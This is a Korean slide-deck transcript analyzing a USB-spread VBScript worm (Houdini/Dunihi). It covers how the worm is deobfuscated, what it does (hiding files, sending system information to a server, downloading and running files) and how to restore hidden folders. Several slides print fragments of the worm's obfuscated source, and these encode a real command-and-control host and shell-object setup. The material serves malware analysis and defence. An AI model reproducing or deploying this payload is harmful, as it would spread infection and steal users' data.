
  • 2. devleoper이상원 • 한양대학교 컴퓨터전공 / ICEWALL 회원 • devleoper 오타난 거 아니에요. • php를 예전에 썼었고 요즘은 Ruby를 주로 쓰고
 웹 개발에 인연이 생겨 웹과 네트워크 보안을 공부합니다. • leo.re.kr
 twitter @devleoper
 fb.me/devleoper
  • 3. 시작 • 학교 실험실에 USB를 꽂았다가 옮은 악성코드 • OS X을 쓰니 감염될 일은 없었지만… 한번 뜯어볼까 • 찾아보니 VBScript로 짜여진(.vbs) 악성코드 • 함께 뜯어 봅시다
  • 4. 스크립트 언어 • 프로그램이 실행되는 순간 소스 코드를 읽어서
 실시간으로 실행시켜 주는 언어 • 매번 컴파일해서 써야 하는 언어가 불편할 때 편리 • 컴퓨터 성능이 좋아지니 많이 사용되고 있습니다 • 소스 코드 상태로 배포되는 프로그램이 많습니다 • PHP, Python, Ruby, JavaScript, VBScript
  • 5. VBScript • 마이크로소프트가 만든 스크립트 언어 • 윈도우 98 이후 대부분의 윈도우에 기본 탑재 • 이름 그대로 Visual Basic의 문법을 따왔어요 • 잘나갈때는 ASP로 웹 개발할때도 쓰던 언어
  • 6. 파일을 열어보니… ali  =  fuck(“UkZwRFRFOVdSVklnUFNBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16SjhaSHA4TVRFMGZHUjZmREV3TVh4a2Vudz   VPWHhrZW53eE1URjhaSHA4TVRBd2ZHUjZmREV3TVh4a2Vud3hNVFI4WkhwOE16SjhaSHA4TlRoOFpIcDhNeko4WkhwOE1UQTBmR1I2 ZkRFeE1YeGtlbnd4TVRkOFpIcDhNVEF3ZkdSNmZERXdOWHhrZW53eE1UQjhaSHA4TVRBMWZHUjZmRE15ZkdSNmZEUXdmR1I2ZkRrNW ZHUjZmRFF4ZkdSNmZETXlmR1I2ZkRFeE5YeGtlbnd4TURkOFpIcDhNVEl4ZkdSNmZERXhNbnhrZW53eE1ERjhaSHA4TXpKOFpIcDhO VGg4WkhwOE16SjhaSHA4TVRBMGZHUjZmREV4TVh4a2Vud3hNVGQ4WkhwOE1UQXdmR1I2ZkRFd05YeGtlbnd4TVRCOFpIcDhNVEExZk dSNmZEUTFmR1I2ZkRFd01ueGtlbnd4TWpCOFpIcDhNeko4WkhwOE9UTjhaSHA4TmpKOFpIcDhNVE44WkhwOE1UQjhaSHA4TVROOFpI cDhNVEI4WkhwOE16bDhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORF Y4WkhwOE5qRjhaSHA4TXpKOFpIcDhPVGw4WkhwOE1URXhmR1I2ZkRFeE1IeGtlbnd4TURKOFpIcDhNVEExZkdSNmZERXdNM3hrZW53 ek1ueGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeG tlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncy TVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2 VudzJNWHhrZW53eE0zeGtlbnd4TUh4a2Vud3hNM3hrZW53eE1IeGtlbnd4TURSOFpIcDhNVEV4ZkdSNmZERXhOWHhrZW53eE1UWjha SHA4TXpKOFpIcDhOakY4WkhwOE16SjhaSHA4TXpSOFpIcDhNVEF5ZkdSNmZERXdNbnhrZW53ME5ueGtlbnd4TVRWOFpIcDhNVEF4Zk dSNmZERXhOSHhrZW53eE1UaDhaSHA4TVRBeGZHUjZmRGs0ZkdSNmZERXdPSHhrZW53eE1URjhaSHA4TVRBemZHUjZmRFEyZkdSNmZE RXhNSHhrZW53eE1ERjhaSHA4TVRFMmZHUjZmRE0wZkdSNmZERXpmR1I2ZkRFd2ZHUjZmREV4TW54a2Vud3hNVEY4WkhwOE1URTBmR1 I2ZkRFeE5ueGtlbnd6TW54a2VudzJNWHhrZW53ek1ueGtlbncxTTN4a2VudzBPSHhrZW53ME9IeGtlbncwT0h4a2Vud3hNM3hrZW53 eE1IeGtlbnd4TURWOFpIcDhNVEV3ZkdSNmZERXhOWHhrZW53eE1UWjhaSHA4T1RkOFpIcDhNVEE0ZkdSNmZERXdPSHhrZW53eE1EQj haSHA4TVRBMWZHUjZmREV4Tkh4a2Vud3pNbnhrZW53Mk1YeGtlbnd6TW54a2Vud3pOSHhrZW53ek4zeGtlbnd4TVRaOFpIcDhNVEF4 ZkdSNmZERXdPWHhrZW53eE1USjhaSHA4TXpkOFpIcDhNelI4WkhwOE1UTjhaSHA4TVRCOFpIcDhNVEE0ZkdSNmZERXhNSHhrZW53eE 1EZDhaSHA4TVRBeWZHUjZmREV3Tlh4a2Vud3hNRGg4WkhwOE1UQXhmR1I2ZkRNeWZHUjZmRFl4ZkdSNmZETXlmR1I2ZkRFeE5ueGtl bnd4TVRSOFpIcDhNVEUzZkdSNmZERXdNWHhrZW53eE0zeGtlbnd4TUh4a2Vud3hNRGg4WkhwOE1URXdmR1I2ZkRFd04zeGtlbnd4TU RKOFpIcDhNVEV4ZkdSNmZERXdPSHhrZW53eE1EQjhaSHA4TVRBeGZHUjZmREV4Tkh4a2Vud3pNbnhrZW53Mk1YeGtlbnd6TW54a2Vu d3hNVFo4WkhwOE1URTBmR1I2ZkRFeE4zeGtlbnd4TURGOFpIcDhNVE44WkhwOE1UQjhaSHA4TVROOFpIcDhNVEI4WkhwOE16bDhaSH A4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TXpK OFpIcDhNVEV5ZkdSNmZERXhOM3hrZW53NU9IeGtlbnd4TURoOFpIcDhNVEExZkdSNmZEazVmR1I2ZkRNeWZHUjZmREV4T0h4a2Vudz VOM3hrZW53eE1UUjhaSHA4TXpKOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4 WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE
  • 7. Base64 • 바이너리 값을 사람이 볼 수 있는 문자로 표현하는 방법 • 대문자 + 소문자 + 숫자 + 더하기랑 슬래시 해서 64 • 비트를 앞에서부터 6비트씩 잘라서 표현 • 엄청 간단하기 때문에 암호화라고 보기는 좀… L                e                o   01001100  01100101  01101111   T          G            V            v 원본 바이너리 base64
  • 9. 두번 디코딩하고 나면… DZCLOVER  =  "39|dz|60|dz|91|dz|32|dz|114|dz|101|dz|99|dz|111|dz|100|dz|101|dz|114|dz|32|dz|58|dz|32|dz| 104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|32|dz|40|dz|99|dz|41|dz|32|dz|115|dz|107|dz|121|dz| 112|dz|101|dz|32|dz|58|dz|32|dz|104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|45|dz|102|dz|120|dz| 32|dz|93|dz|62|dz|13|dz|10|dz|13|dz|10|dz|39|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 32|dz|99|dz|111|dz|110|dz|102|dz|105|dz|103|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10|dz|104|dz|111|dz|115|dz|116|dz|32|dz|61|dz|32|dz|34|dz| 102|dz|102|dz|46|dz|115|dz|101|dz|114|dz|118|dz|101|dz|98|dz|108|dz|111|dz|103|dz|46|dz|110|dz|101|dz| 116|dz|34|dz|13|dz|10|dz|112|dz|111|dz|114|dz|116|dz|32|dz|61|dz|32|dz|53|dz|48|dz|48|dz|48|dz|13|dz| 10|dz|105|dz|110|dz|115|dz|116|dz|97|dz|108|dz|108|dz|100|dz|105|dz|114|dz|32|dz|61|dz|32|dz|34|dz|37| dz|116|dz|101|dz|109|dz|112|dz|37|dz|34|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|105|dz|108|dz|101| dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|111|dz|108| dz|100|dz|101|dz|114|dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|13|dz|10|dz|39|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|32|dz|112|dz|117|dz|98|dz|108|dz|105|dz|99|dz| 32|dz|118|dz|97|dz|114|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45| dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10| dz|100|dz|105|dz|109|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|13|dz|10| dz|115|dz|101|dz|116|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32| dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111| dz|98|dz|106|dz|101|dz|99|dz|116|dz|40|dz|34|dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz| 115|dz|104|dz|101|dz|108|dz|108|dz|34|dz|41|dz|13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|102|dz|105|dz| 108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|13|dz|10|dz|115|dz|101|dz| 116|dz|32|dz|102|dz|105|dz|108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106| dz|32|dz|61|dz|32|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz| 40|dz|34|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|105|dz|110|dz|103|dz|46|dz|102|dz|105|dz|108|dz| 101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz|34|dz|41|dz| 13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|13|dz|10|dz| 115|dz|101|dz|116|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32|dz|99|dz|114
  • 10. 두번 디코딩하고 나면… DZCLOVER  =  "39|dz|60|dz|91|dz|32|dz|114|dz|101|dz|99|dz|111|dz|100|dz|101|dz|114|dz|32|dz|58|dz|32|dz| 104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|32|dz|40|dz|99|dz|41|dz|32|dz|115|dz|107|dz|121|dz| 112|dz|101|dz|32|dz|58|dz|32|dz|104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|45|dz|102|dz|120|dz| 32|dz|93|dz|62|dz|13|dz|10|dz|13|dz|10|dz|39|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 32|dz|99|dz|111|dz|110|dz|102|dz|105|dz|103|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10|dz|104|dz|111|dz|115|dz|116|dz|32|dz|61|dz|32|dz|34|dz| 102|dz|102|dz|46|dz|115|dz|101|dz|114|dz|118|dz|101|dz|98|dz|108|dz|111|dz|103|dz|46|dz|110|dz|101|dz| 116|dz|34|dz|13|dz|10|dz|112|dz|111|dz|114|dz|116|dz|32|dz|61|dz|32|dz|53|dz|48|dz|48|dz|48|dz|13|dz| 10|dz|105|dz|110|dz|115|dz|116|dz|97|dz|108|dz|108|dz|100|dz|105|dz|114|dz|32|dz|61|dz|32|dz|34|dz|37| dz|116|dz|101|dz|109|dz|112|dz|37|dz|34|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|105|dz|108|dz|101| dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|111|dz|108| dz|100|dz|101|dz|114|dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|13|dz|10|dz|39|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|32|dz|112|dz|117|dz|98|dz|108|dz|105|dz|99|dz| 32|dz|118|dz|97|dz|114|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45| dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10| dz|100|dz|105|dz|109|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|13|dz|10| dz|115|dz|101|dz|116|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32| dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111| dz|98|dz|106|dz|101|dz|99|dz|116|dz|40|dz|34|dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz| 115|dz|104|dz|101|dz|108|dz|108|dz|34|dz|41|dz|13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|102|dz|105|dz| 108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|13|dz|10|dz|115|dz|101|dz| 116|dz|32|dz|102|dz|105|dz|108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106| dz|32|dz|61|dz|32|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz| 40|dz|34|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|105|dz|110|dz|103|dz|46|dz|102|dz|105|dz|108|dz| 101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz|34|dz|41|dz| 13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|13|dz|10|dz| 115|dz|101|dz|116|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32|dz|99|dz|114
  • 11. 아이 갓 더 소스
  • 12. 소스를 열어보니 • 예쁘게 주석도 달려 있고 들여쓰기도 잘 해놓았어요 • 무한 루프로 계속해서 돌아가면서 다른 저장 장치가 연결되거나 폴더가 새로 생기면 숨기고…
  • 13. 소스를 열어보니 • 지정된 서버에 컴퓨터의 이름이나 사용자 이름, 설치 된 하드웨어나 안티바이러스 소프트웨어 목록을 전송
  • 14. 소스를 열어보니 • 지정된 서버에서 파일을 다운받거나
 업로드하는 코드도 발견
  • 15. 다른 곳에서는 어떻게 보나? • VirusTotal에 제출해보니 57개 안티바이러스
 소프트웨어 중 33개가 이 악성코드를 진단 • Windows Defender 최신 버전을 사용한다면
 감염된 USB 꽂았을 때 즉시 초고속★삭제 https://www.virustotal.com/ko/file/84b5033d5acd2a964dcf2ddd9d8c840aa8b8a9a8bc860bbce946fc9cf7642cda/analysis/
  • 16. 다른 곳에서는 어떻게 보나? http://www.symantec.com/security_response/writeup.jsp?docid=2013-091222-3652-99 http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Worm%3AVBS%2FDunihi.A USB나 제거 가능한 매체를 통해 전파됩니다. 해커가 귀하의 PC를 액세스할 수 있도록 합니다. • 원격 서버에 HTTP POST 요청을 보냅니다.
 (PC 이름, 사용자 이름, 디스크 볼륨과 시리얼, 운영 체제
 버전, 안티바이러스 소프트웨어 목록 등을 전송) • 감염자의 PC에서 명령을 실행합니다. • 파일을 다운로드하고 실행합니다. • 로컬 파일을 공격자에게 전송합니다. • …
  • 17. 정리 • 스크립트 언어에서는 난독화해봤자 어차피 원래 소스 가 되어서(eval) 실행되기 때문에 쓸모 없음 • 괜히 공용 컴퓨터에 USB 못 꽂게 하는게 아닌듯 • 위험은 우리 주변을 늘 도사리고 있으니 남의 USB
 꽂아주지도, 남의 컴퓨터에 USB 꽂지도 말자!
  • 18. …이 아니고, 치료는 했는데 
 내 폴더가 안 보이잖아! 끝…
  • 19. …이 아니고, 치료는 했는데 
 내 폴더가 안 보이잖아!
  • 20. 바로가기 만들고 숨기면서 무슨 짓을 했던 걸까요?
  • 21. 도와줘요 테크넷! 상수 값 설명 일반 0 아무런 attribute 값이 없을 때 읽기 전용 1 읽을 수는 있지만 수정은 안 됨 숨김 2 내 컴퓨터나 Windows 탐색기에서 보이지 않음 시스템 4 운영체제에서 필요로 하는 파일 https://technet.microsoft.com/en-us/library/ee198707.aspx • FileSystemObj에서 파일의 속성 값을 불러오거나 변경 할 때는 상수에 해당하는 값을 더하는 걸로 계산합니다.
 (마치 유닉스 시스템의 퍼미션처럼) 2 + 4 = 숨김 파일 + 시스템 파일
  • 22. 체크를 풀면 보이긴 하지만… • 보호된 운영체제 파일로 간주되어 일반적인 방법으로 볼 수도 없고 보호를 풀 수도 없음.
  • 23. 원상 복귀 스크립트 만들기 https://gist.github.com/devleoper/60262bf56077d8d3e35d
  • 24. 한번 더 정리 • 지금까지 Houdini Worm을 분석하고
 우리들의 USB를 원상 복귀하는것까지 알아봤습니다. • USB는 잘 챙겨야겠습니다. • 공용 컴퓨터에 파일 옮길때는 클라우드가 안전하…죠? • 스크립트 언어는 배워두면 좋습니다.